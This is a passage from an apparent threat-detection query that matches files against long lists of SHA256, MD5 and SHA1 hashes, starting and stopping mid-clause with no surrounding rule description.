'%SHA256=4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2%' ESCAPE '\\' OR Hashes LIKE '%SHA256=dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395%' ESCAPE '\\' OR Hashes LIKE '%SHA256=aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374%' ESCAPE '\\' OR Hashes LIKE '%SHA256=81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41%' ESCAPE '\\' OR Hashes LIKE '%SHA256=06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80%' ESCAPE '\\' OR Hashes LIKE '%SHA256=314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414%' ESCAPE '\\' OR Hashes LIKE '%SHA256=dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22%' ESCAPE '\\' OR Hashes LIKE '%SHA256=221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508%' ESCAPE '\\' OR Hashes LIKE '%SHA256=78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af%' ESCAPE '\\' OR Hashes LIKE '%SHA256=58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495%' ESCAPE '\\' OR Hashes LIKE '%SHA256=dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21%' ESCAPE '\\' OR Hashes LIKE '%SHA256=91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35%' ESCAPE '\\' OR Hashes LIKE '%SHA256=927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b%' ESCAPE '\\') OR md5 IN ('1b5c3c458e31bede55145d0644e88d75', '6f5d54ab483659ac78672440422ae3f1', 'ee6b1a79cb6641aa44c762ee90786fe0', 'c02f70960fa934b8defa16a03d7f6556', '839cbbc86453960e9eb6db814b776a40', 'acac842a46f3501fe407b1db1b247a0b', '95e4c7b0384da89dce8ea6f31c3613d9', 'e700a820f117f65e813b216fccbf78c9', '96b463b6fa426ae42c414177af550ba2', '27bcbeec8a466178a6057b64bef66512', '70dcd07d38017b43f710061f37cb4a91', 'db72def618cbc3c5f9aa82f091b54250', '83601bbe5563d92c1fdb4e960d84dc77', '5970e8de1b337ca665114511b9d10806', '49fe3d1f3d5c2e50a0df0f6e8436d778', 
'1493d342e7a36553c56b2adea150949e', '4f191abc652d8f7442ca2636725e1ed6', '0ae30291c6cbfa7be39320badd6e8de0', 'd104621c93213942b7b43d65b5d8d33e', 'b89b097b8b8aecb8341d05136f334ebb', '14580bd59c55185115fd3abe73b016a2', '992ded5b623be3c228f32edb4ca3f2d2', 'a26e600652c33dd054731b4693bf5b01', '1f950cfd5ed8dd9de3de004f5416fe20', '491aec2249ad8e2020f9f9b559ab68a8', 'e4266262a77fffdea2584283f6c4f51d', 'bd25be845c151370ff177509d95d5add', '9638f265b1ddd5da6ecdf5c0619dcbe6', '4e90cd77509738d30d3181a4d0880bfa', '0a6a1c9a7f80a2a5dcced5c4c0473765', '9aa7ed7809eec0d8bc6c545a1d18107a', 'aa1ed3917928f04d97d8a217fe9b5cb1', '42f7cc4be348c3efd98b0f1233cf2d69', '4cc3ddd5ae268d9a154a426af2c23ef9', '2fed983ec44d1e7cffb0d516407746f2', 'f7cbbb5eb263ec9a35a1042f52e82ca4', 'ed6348707f177629739df73b97ba1b6e', '40bc58b7615d00eb55ad9ba700c340c1', 'c3fea895fe95ea7a57d9f4d7abed5e71', '2128e6c044ee86f822d952a261af0b48', '3dbf69f935ea48571ea6b0f5a2878896', 'c6f8983dd3d75640c072a8459b8fa55a', '6fcf56f6ca3210ec397e55f727353c4a', '79f7e6f98a5d3ab6601622be4471027f', 'bae1f127c4ff21d8fe45e2bbfc59c180', 'c533d6d64b474ffc3169a0e0fc0a701a', '3f39f013168428c8e505a7b9e6cba8a2', '748cf64b95ca83abc35762ad2c25458f', 'bce7f34912ff59a3926216b206deb09f', '2d8e4f38b36c334d0a32a7324832501d', '47e6ac52431ca47da17248d80bf71389', '3651a6990fe38711ebb285143f867a43', 'dc943bf367ae77016ae399df8e71d38a', '02198692732722681f246c1b33f7a9d9', 'ddc2ffe0ab3fcd48db898ab13c38d88d', '0ec361f2fba49c73260af351c39ff9cb', 'c1fce7aac4e9dd7a730997e2979fa1e2', '49938383844ceec33dba794fb751c9a5', '34069a15ae3aa0e879cd0d81708e4bcc', '1c294146fc77565030603878fd0106f9', 'fd81af62964f5dd5eb4a828543a33dcf', 'bd5b0514f3b40f139d8079138d01b5f6', 'fa173832dca1b1faeba095e5c82a1559', '5cc5c26fc99175997d84fe95c61ab2c2', '1ed043249c21ab201edccb37f1d40af9', '361a598d8bb92c13b18abb7cac850b01', '9b359b722ac80c4e0a5235264e1e0156', '296bde4d0ed32c6069eb90c502187d0d', 'd3e40644a91327da2b1a7241606fe559', '12cecc3c14160f32b21279c1a36b8338', 
'dd39a86852b498b891672ffbcd071c03', 'b2a9ac0600b12ec9819e049d7a6a0b75', '444f538daa9f7b340cfd43974ed43690', '7b43dfd84de5e81162ebcfafb764b769', '13dda15ef67eb265869fc371c72d6ef0', '300c5b1795c9b6cc1bc4d7d55c7bbe85', '1392b92179b07b672720763d9b1028a5', '2e1f8a2a80221deb93496a861693c565', '8065a7659562005127673ac52898675f', 'b5ada7fd226d20ec6634fc24768f9e22', '84fb76ee319073e77fb364bbbbff5461', 'daf800da15b33bf1a84ee7afc59f0656', 'f7393fb917aed182e4cbef25ce8af950', '120b5bbb9d2eb35ff4f62d79507ea63a', '73c98438ac64a68e88b7b0afd11ba140', '51207adb8dab983332d6b22c29fe8129', '4a23e0f2c6f926a41b28d574cbc6ac30', '20125794b807116617d43f02b616e092', 'e8ebba56ea799e1e62748c59e1a4c586', '8abbb12e61045984eda19e2dc77b235e', 'f66b96aa7ae430b56289409241645099', '97e3a44ec4ae58c8cc38eefc613e950e', 'ff7b31fa6e9ab923bce8af31d1be5bb2', '12908c285b9d68ee1f39186110df0f1e', '6126065af2fc2639473d12ee3c0c198e', '356bda2bf0f6899a2c08b2da3ec69f13', 'fd7de498a72b2daf89f321d23948c3c4', '338a98e1c27bc76f09331fcd7ae413a5', 'c9a293762319d73c8ee84bcaaf81b7b3', 'e9e786bdba458b8b4f9e93d034f73d00', 'a17c58c0582ee560c72f60764ed63224', '21e13f2cb269defeae5e1d09887d47bb', 'a57b47489febc552515778dd0fd1e51c', 'd6e9f6c67d9b3d790d592557a7d57c3c', '76bb1a4332666222a8e3e1339e267179', '1cd158a64f3d886357535382a6fdad75', 'd9e7e5bcc5b01915dbcef7762a7fc329', 'd253c19194a18030296ae62a10821640', 'b12d1630fd50b2a21fd91e45d522ba3a', '50b39072d0ee9af5ef4824eca34be6e3', '778b7feea3c750d44745d3bf294bd4ce', '0761c357aed5f591142edaefdf0c89c8', '23cf3da010497eb2bf39a5c5a57e437c', 'c49a1956a6a25ffc25ad97d6762b0989', 'f406c5536bcf9bacbeb7ce8a3c383bfa', 'f2f728d2f69765f5dfda913d407783d2', '4b817d0e7714b9d43db43ae4a22a161e', '715f8efab1d1c660e4188055c4b28eed', 'a01c412699b6f21645b2885c2bae4454', '010c0e5ac584e3ab97a2daf84cf436f5', 'd5db81974ffda566fa821400419f59be', '3247014ba35d406475311a2eab0c4657', '4d487f77be4471900d6ccbc47242cc25', '1f2888e57fdd6aee466962c25ba7d62d', '507a649eb585d8d0447eab0532ef0c73', 
'4ad8fd9e83d7200bd7f8d0d4a9abfb11', 'cd9f0fcecf1664facb3671c0130dc8bb', 'b10b210c5944965d0dc85e70a0b19a42', 'ae5eb2759305402821aeddc52ba9a6d6', 'f5051c756035ef5de9c4c48bacb0612b', '1898ceda3247213c084f43637ef163b3', '37086ae5244442ba552803984a11d6cb', '825703c494e0d270f797f1ecf070f698', '909f3fc221acbe999483c87d9ead024a', '75d6c3469347de1cdfa3b1b9f1544208', '9ab9f3b75a2eb87fafb1b7361be9dfb3', '5f9785e7535f8f602cb294a54962c9e7', '7d46d0ddaf8c7e1776a70c220bf47524', 'f9844524fb0009e5b784c21c7bad4220', '828bb9cb1dd449cd65a29b18ec46055f', '4d17b32be70ef39eae5d5edeb5e89877', '2391fb461b061d0e5fccb050d4af7941', '6d4159694e1754f262e326b52a3b305a', 'a60c9173563b940203cf4ad38ccf2082', '63e333d64a8716e1ae59f914cb686ae8', 'a9f220b1507a3c9a327a99995ff99c82', 'c5f5d109f11aadebae94c77b27cb026f', '5bab40019419a2713298a5c9173e5d30', 'c996d7971c49252c582171d9380360f2', '98763a3dee3cf03de334f00f95fc071a', 'e79c91c27df3eaf82fb7bd1280172517', 'a42249a046182aaaf3a7a7db98bfa69d', '803a371a78d528a44ef8777f67443b16', '9007c94c9d91ccff8d7f5d4cdddcc403', '11fb599312cb1cf43ca5e879ed6fb71e', '7f9309f5e4defec132b622fadbcad511', '04a88f5974caa621cee18f34300fc08a', '8636fe3724f2bcba9399daffd6ef3c7e', '9dfd73dadb2f1c7e9c9d2542981aaa63', '490b1f404c4f31f4538b36736c990136', 'c1d063c9422a19944cdaa6714623f2ec', 'dacb62578b3ea191ea37486d15f4f83c', '2da209dde8188076a9579bd256dc90d0', '0ba6afe0ea182236f98365bd977adfdf', '4c016fd76ed5c05e84ca8cab77993961', 'ad22a7b010de6f9c6f39c350a471a440', '79483cb29a0c428e1362ec8642109eee', 'a179c4093d05a3e1ee73f6ff07f994aa', 'ccf523b951afaa0147f22e2a7aae4976', '736c4b85ce346ddf3b49b1e3abb4e72a', 'b0baac4d6cbac384a633c71858b35a2e', '798de15f187c1f013095bbbeb6fb6197', 'a86150f2e29b35369afa2cafd7aa9764', 'b941c8364308990ee4cc6eadf7214e0f', 'dd04cd3de0c19bede84e9c95a86b3ca8', '6909b5e86e00b4033fedfca1775b0e33', '9b91a44a488e4d539f2e55476b216024', '8b287636041792f640f92e77e560725e', '07f83829e7429e60298440cd1e601a6a', '0395b4e0eb21693590ad1cfdf7044b8b', 
'4b058945c9f2b8d8ebc485add1101ba5', '0067c788e1cb174f008c325ebde56c22', 'c2c1b8c00b99e913d992a870ed478a24', '84ba7af6ada1b3ea5efb9871a0613fc6', 'dbc415304403be25ac83047c170b0ec2', '31469f1313871690e8dc2e8ee4799b22', '2d465b4487dc81effaa84f122b71c24f', '64efbffaa153b0d53dc1bccda4279299', 'b164daf106566f444dfb280d743bc2f7', '7c72a7e1d42b0790773efd8700e24952', '56a515173b211832e20fbc64e5a0447c', 'c2eb4539a4f6ab6edd01bdc191619975', 'd1bac75205c389d6d5d6418f0457c29b', '68dde686d6999ad2e5d182b20403240b', 'a785b3bc4309d2eb111911c1b55e793f', '6ab7b8ef0c44e7d2d5909fdb58d37fa5', 'd9ce18960c23f38706ae9c6584d9ac90', 'ab53d07f18a9697139ddc825b466f696', 'ba5f0f6347780c2ed911bbf888e75bef', '13ee349c15ee5d6cf640b3d0111ffc0e', '9a237fa07ce3ed06ea924a9bed4a6b99', 'fa222bed731713904320723b9c085b11', '0898af0888d8f7a9544ef56e5e16354e', 'e076dadf37dd43a6b36aeed957abee9e', '4f27c09cc8680e06b04d6a9c34ca1e08', '1b32c54b95121ab1683c7b83b2db4b96', '715572dfe6fb10b16f980bfa242f3fa5', '4a06bcd96ef0b90a1753a805b4235f28', 'f242cffd9926c0ccf94af3bf16b6e527', '7ed6030f14e66e743241f2c1fa783e69', '0d6fef14f8e1ce5753424bd22c46b1ce', 'a4fda97f452b8f8705695a729f5969f7', '62c18d61ed324088f963510bae43b831', 'd5a642329cce4df94b8dc1ba9660ae34', 'a641e3dccba765a10718c9cb0da7879e', 'ed07f1a8038596574184e09211dfc30f', '3473faea65fba5d4fbe54c0898a3c044', '708ac9f7b12b6ca4553fd8d0c7299296', 'bbe4f5f8b0c0f32f384a83ae31f49a00', '257483d5d8b268d0d679956c7acdf02d', '312e31851e0fc2072dbf9a128557d6ef', '14eead4d42728e9340ec8399a225c124', 'de1cc5c266140bff9d964fab87a29421', '9a9dbf5107848c254381be67a4c1b1dd', '1dc94a6a82697c62a04e461d7a94d0b0', '2850608430dd089f24386f3336c84729', '6d131a7462e568213b44ef69156f10a5', 'b8b6686324f7aa77f570bc019ec214e6', '22823fed979903f8dfe3b5d28537eb47', 'c1d3a6bb423739a5e781f7eee04c9cfd', '0c0195c48b6b8582fa6f6373032118da', '5228b7a738dc90a06ae4f4a7412cb1e9', '62f02339fe267dc7438f603bfb5431a1', '22949977ce5cd96ba674b403a9c81285', '5ca1922ed5ee2b533b5f3dd9be20fd9a', 
'1ed08a6264c5c92099d6d1dae5e8f530', 'b0770094c3c64250167b55e4db850c04', 'a6e9d6505f6d2326a8a9214667c61c67', '8407ddfab85ae664e507c30314090385', '9321a61a25c7961d9f36852ecaa86f55', 'a711e6ab17802fabf2e69e0cd57c54cd', '29ccff428e5eb70ae429c3da8968e1ec', '79df0eabbf2895e4e2dae15a4772868c', 'fb7c61ef427f9b2fdff3574ee6b1819b', 'f778489c7105a63e9e789a02412aaa5f', 'fef9dd9ea587f8886ade43c1befbdafe', '43830326cd5fae66f5508e27cbec39a0', 'c7a57cd4bea07dadba2e2fb914379910', 'f1e054333cc40f79cfa78e5fbf3b54c2', 'dc564bac7258e16627b9de0ce39fae25', '054299e09cea38df2b84e6b29348b418', '97221e16e7a99a00592ca278c49ffbfc', '8d63e1a9ff4cafee1af179c0c544365c', '96421b56dbda73e9b965f027a3bda7ba', '4ae55080ec8aed49343e40d08370195c', '988dabdcf990b134b0ac1e00512c30c4', 'bbbc9a6cc488cfb0f6c6934b193891eb', '76c643ab29d497317085e5db8c799960', 'e9a30edef1105b8a64218f892b2e56ed', '7bd840ff7f15df79a9a71fec7db1243e', '1cff7b947f8c3dea1d34dc791fc78cdc', '2c54859a67306e20bfdc8887b537de72', 'a5f637d61719d37a5b4868c385e363c0', '2509a71a02296aa65a3428ddfac22180', '6cce5bb9c8c2a8293df2d3b1897941a2', '7a16fca3d56c6038c692ec75b2bfee15', 'eaea9ccb40c82af8f3867cd0f4dd5e9d', 'd2588631d8aae2a3e54410eaf54f0679', 'b47dee29b5e6e1939567a926c7a3e6a4', 'fac8eb49e2fd541b81fcbdeb98a199cb', '1a234f4643f5658bab07bfa611282267', '0752f113d983030939b4ab98b0812cf0') OR sha1 IN ('f0c463d29a5914b01e4607889094f1b7d95e7aaf', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '684786de4b3b3f53816eae9df5f943a22c89601f', '745335bcdf02fb42df7d890a24858e16094f48fd', '25d812a5ece19ea375178ef9d60415841087726e', 'd417c0be261b0c6f44afdec3d5432100e420c3ed', '6afc6b04cf73dd461e4a4956365f25c1f1162387', '01a578a3a39697c4de8e3dab04dba55a4c35163e', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', '7e836dadc2e149a0b758c7e22c989cbfcce18684', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'bc2f3850c7b858340d7ed27b90e63b036881fd6c', 'e22495d92ac3dcae5eeb1980549a9ead8155f98a', 
'c969f1f73922fd95db1992a5b552fbc488366a40', '4c18754dca481f107f0923fb8ef5e149d128525d', '2fc6845047abcf2a918fce89ab99e4955d08e72c', '4f7a8e26a97980544be634b26899afbefb0a833c', '21edff2937eb5cd6f6b0acb7ee5247681f624260', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '6c1bb3a72ebfb5359b9e22ca44d0a1ff825a68f2', '064de88dbbea67c149e779aac05228e5405985c7', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '55ab7e27412eca433d76513edc7e6e03bcdd7eda', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', 'a6816949cd469b6e5c35858d19273936fab1bef6', '91f832f46e4c38ecc9335460d46f6f71352cffed', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '01779ee53f999464465ed690d823d160f73f10e7', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', '27d3ebea7655a72e6e8b95053753a25db944ec0f', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', '10115219e3595b93204c70eec6db3e68a93f3144', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '2c27abbbbcf10dfb75ad79557e30ace5ed314df8', '10e15ba8ff8ed926ddd3636cec66a0f08c9860a4', '291b4a88ffd2ac1d6bf812ecaedc2d934dc503cb', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', 'a7948a4e9a3a1a9ed0e4e41350e422464d8313cd', '19bd488fe54b011f387e8c5d202a70019a204adf', 'eeff4ec4ebc12c6acd2c930dc2eaaf877cfec7ec', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', 'd02403f85be6f243054395a873b41ef8a17ea279', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '4789b910023a667bee70ff1f1a8f369cffb10fe8', '50e2bc41f0186fdce970b80e2a2cb296353af586', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', 'e039c9dd21494dbd073b4823fc3a17fbb951ec6c', '806832983bb8cb1e26001e60ea3b7c3ade4d3471', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', 'a3ed5cbfbc17b58243289f3cf575bf04be49591d', '7fb52290883a6b69a96d480f2867643396727e83', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', 'da9cea92f996f938f699902482ac5313d5e8b28e', 
'dc7b022f8bd149efbcb2204a48dce75c72633526', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '51b60eaa228458dee605430aae1bc26f3fc62325', 'c6bd965300f07012d1b651a9b8776028c45b149a', '729a8675665c61824f22f06c7b954be4d14b52c4', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'e4436c8c42ba5ffabd58a3b2256f6e86ccc907ab', '7ba19a701c8af76988006d616a5f77484c13cb0a', '25bf4e30a94df9b8f8ab900d1a43fd056d285c9d', 'd8498707f295082f6a95fd9d32c9782951f5a082', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '943593e880b4d340f2548548e6e673ef6f61eed3', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '4a7d66874a0472a47087fabaa033a85d47413379', '012db3a80faf1f7f727b538cbe5d94064e7159de', '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4', 'c6d349823bbb1f5b44bae91357895dba653c5861', '643383938d5e0d4fd30d302af3e9293a4798e392', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '1d0df45ee3fa758f0470e055915004e6eae54c95', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', 'd5fd9fe10405c4f90235e583526164cd0902ed86', '0c74d09da7baf7c05360346e4c3512d0cd433d59', '9c256edd10823ca76c0443a330e523027b70522d', '65d8a7c2e867b22d1c14592b020c548dd0665646', '7859e75580570e23a1ef7208b9a76f81738043d5', 'b242b0332b9c9e8e17ec27ef10d75503d20d97b6', '6523b3fd87de39eb5db1332e4523ce99556077dc', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'fe10018af723986db50701c8532df5ed98b17c39', 'b9807b8840327c6d7fbdde45fc27de921f1f1a82', 'a3636986cdcd1d1cb8ab540f3d5c29dcc90bb8f0', '054a50293c7b4eea064c91ef59cf120d8100f237', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', '485c0b9710a196c7177b99ee95e5ddb35b26ddd1', 'faa870b0cb15c9ac2b9bba5d0470bd501ccd4326', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', '0291d0457acaf0fe8ed5c3137302390469ce8b35', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', '5a7dd0da0aee0bdedc14c1b7831b9ce9178a0346', 
